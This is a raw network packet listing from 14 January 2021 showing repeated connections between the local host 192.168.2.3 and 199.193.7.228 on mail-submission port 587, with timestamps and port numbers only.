Jan 14, 2021 08:01:03.110693932 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.110698938 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.110780001 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.111210108 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.217080116 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.217592001 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.218055010 CET	49786	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.300460100 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.300504923 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.300534010 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.300558090 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.300702095 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.300776958 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.300789118 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.300901890 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.301249981 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.301317930 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.301374912 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.408417940 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.430380106 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.431190014 CET	49786	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.492158890 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.492187977 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.492206097 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.492223024 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.492238998 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.492257118 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.492273092 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.492296934 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.492336988 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.492455959 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.492499113 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.492511034 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.492624044 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.495372057 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.498614073 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.621709108 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.623310089 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.624835014 CET	49786	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.625161886 CET	49786	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.625718117 CET	49786	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.626111984 CET	49786	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.626441956 CET	49786	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.626713037 CET	49786	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.627010107 CET	49786	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.627264023 CET	49786	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.682163954 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.682202101 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.682410955 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.682477951 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.682948112 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.682987928 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.683013916 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.683036089 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.683058023 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.683110952 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.683229923 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.683263063 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.683350086 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.683384895 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.683445930 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.683696985 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.683926105 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.684159040 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.684396029 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.684649944 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.684881926 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.685122013 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.685363054 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.685580015 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.685691118 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.685781002 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.685967922 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.687036037 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.687177896 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.688971996 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.689131021 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.815803051 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.815834045 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.817451954 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.817977905 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.817998886 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.818007946 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.819283962 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.819305897 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.835161924 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.872853994 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.872898102 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.873138905 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.873189926 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.873332024 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.873433113 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.873709917 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.873756886 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.873898029 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.874119043 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.874150038 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.874217987 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.874248981 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.874346018 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.874393940 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.874438047 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.874483109 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.874509096 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.875053883 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.875097990 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.875255108 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.875458002 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.881658077 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.881896019 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.889416933 CET	49786	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.892838001 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:03.936289072 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:03.986475945 CET	49786	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:04.071873903 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:04.072146893 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:04.072447062 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:04.178781986 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:04.178814888 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:04.178829908 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:04.178935051 CET	49786	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:04.179549932 CET	49786	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:04.262357950 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:04.262814999 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:04.369959116 CET	587	49786	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:04.452689886 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:04.452733994 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:04.452750921 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:04.452850103 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:04.454618931 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:04.455322027 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:04.644643068 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:04.644685984 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:04.645195961 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:04.645641088 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:04.646151066 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:04.836792946 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:04.838896990 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:04.839657068 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:05.029515028 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:05.033617973 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:05.034110069 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:05.224694967 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:05.230081081 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:05.230797052 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:05.377473116 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:05.420717001 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:05.450953007 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:05.451499939 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:05.568164110 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:05.568279982 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:05.641328096 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:05.642118931 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:05.642770052 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:05.642899036 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:05.643062115 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:05.643194914 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:05.643358946 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:05.643465996 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:05.643629074 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:05.761015892 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:05.761476994 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:05.832721949 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:05.832737923 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:05.832828045 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:05.832905054 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:05.832936049 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:05.832974911 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:05.833200932 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:05.833262920 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:05.833359003 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:05.833434105 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:05.833800077 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:05.833808899 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:05.951507092 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:05.951705933 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:05.952223063 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.022989035 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.023178101 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.023296118 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.023418903 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.023449898 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.023617029 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.023680925 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.023791075 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.142236948 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.142834902 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.213403940 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.213423014 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.213429928 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.213440895 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.213587046 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.213654041 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.213685989 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.213727951 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.213748932 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.215821981 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.333026886 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.333049059 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.333161116 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.334724903 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.335721016 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.344865084 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.403604984 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.403750896 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.403769970 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.403848886 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.403847933 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.403887987 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.403944016 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.403968096 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.403976917 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.404298067 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.404463053 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.404633045 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.404774904 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.404917002 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.405066967 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.405368090 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.405524015 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.405670881 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.405683994 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.405957937 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.406135082 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.406433105 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.406573057 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.406729937 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.406842947 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.440295935 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.524785995 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.524977922 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.525629997 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.525935888 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.526504040 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.534804106 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.535178900 CET	587	49785	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.535254955 CET	49785	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.593872070 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.593995094 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.594008923 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.594029903 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.594043970 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.594145060 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.594185114 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.594347000 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.594466925 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.594785929 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.595271111 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.595385075 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.595495939 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.595779896 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.595968008 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.596458912 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.596482038 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.596554041 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.605449915 CET	587	49787	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.631081104 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.631244898 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.655276060 CET	49787	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.716645002 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.717525959 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.718584061 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.823236942 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.823589087 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:06.908700943 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.914194107 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:06.914819002 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:07.013827085 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:07.014662027 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:07.015180111 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:07.104902983 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:07.108200073 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:07.109045982 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:07.205461025 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:07.205923080 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:07.299168110 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:07.329637051 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:07.330403090 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:07.396682024 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:07.396727085 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:07.396831989 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:07.398415089 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:07.399174929 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:07.520508051 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:07.521363974 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:07.521991968 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:07.522142887 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:07.522314072 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:07.522486925 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:07.566617966 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:07.588607073 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:07.588625908 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:07.589421988 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:07.590087891 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:07.590684891 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:07.712241888 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:07.712259054 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:07.712325096 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:07.712361097 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:07.712479115 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:07.756822109 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:07.756937981 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:07.780987978 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:07.783332109 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:07.783966064 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:07.902400970 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:07.902559042 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:07.947012901 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:07.947196960 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:07.974150896 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:07.977262974 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:07.977658033 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.046946049 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.047106028 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.093957901 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.094156027 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.137340069 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.137521029 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.137581110 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.137684107 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.169310093 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.174534082 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.175297022 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.237231970 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.237524986 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.284954071 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.284976006 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.285454035 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.327913046 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.327946901 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.327958107 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.328248024 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.368045092 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.398880005 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.399660110 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.427736044 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.427980900 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:08.476917028 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.476944923 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:08.476977110 CET	587	49788	199.193.7.228	192.168.2.3
